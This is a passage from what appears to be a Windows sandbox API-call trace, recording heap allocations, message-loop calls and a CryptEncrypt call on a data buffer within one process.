hHeap=0x970000) returned 1 [0133.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0133.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0133.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0133.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0133.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0133.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0133.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0133.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0133.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0133.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0133.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0133.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0133.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50b78 [0133.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50b78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0133.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0133.767] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0133.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0133.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0133.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e543f0 [0133.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0133.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0133.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0133.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0133.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0133.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0133.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0133.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0133.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0133.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0133.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0133.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0133.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0133.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0133.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0133.768] CryptEncrypt (in: hKey=0xa87610, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2ebc288*, pdwDataLen=0x8cef60*=0x13fbd, dwBufLen=0x13fc0 | out: pbData=0x2ebc288*, pdwDataLen=0x8cef60*=0x13fc0) returned 1 [0133.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0133.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0133.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0133.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0133.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0133.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0133.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0133.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0133.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0133.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0133.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0133.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0133.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0133.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0133.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0133.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0133.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0133.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0133.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0133.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0133.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0133.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0133.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0133.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0133.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0133.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0133.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0133.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0133.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0133.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0133.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0133.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0133.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0133.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0133.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0133.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0133.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0133.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0133.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0133.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0133.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0133.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0133.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0133.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0133.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0133.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0133.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0133.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0133.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0133.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0133.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0133.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0133.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0133.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0133.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0133.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0133.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0133.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0133.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0133.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0133.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0133.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0133.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0133.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0133.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0133.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0133.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0133.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0133.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0133.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0133.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0133.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0133.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0133.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0133.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0133.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0133.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0133.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0133.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0133.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0133.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0133.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0133.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0133.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0133.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0133.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0133.778] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0133.778] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0133.778] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0133.778] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0133.778] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0133.778] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0133.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0133.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0133.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0133.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0133.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0133.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0133.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0133.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0133.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0133.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0133.779] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0133.779] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0133.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0133.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0133.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0133.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0133.779] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0133.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0133.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0133.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0133.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0133.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0133.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0133.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0133.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0133.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0133.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0133.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0133.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0133.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13fc0) returned 0x2ed0250 [0133.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0133.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0133.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0133.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0133.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0133.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0133.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0133.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0133.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0133.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0133.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0133.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0133.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13fc0) returned 0x2ee4218 [0133.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ed0250 | out: hHeap=0x970000) returned 1 [0133.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0133.800] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0133.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0133.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0133.800] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0133.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0133.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0133.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0133.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0133.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0133.800] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0133.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0133.801] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0133.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0133.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0133.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0133.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0133.801] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0133.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0133.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0133.801] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0133.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0133.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0133.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0133.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0133.801] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0133.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0133.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0133.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0133.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0133.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0133.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0133.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0133.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0133.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0133.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0133.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0133.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0133.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0133.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0133.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0133.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0133.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0133.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0133.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0133.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0133.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0133.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0133.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0133.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0133.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0133.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0133.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0133.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0133.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0133.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0133.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0133.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0133.803] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 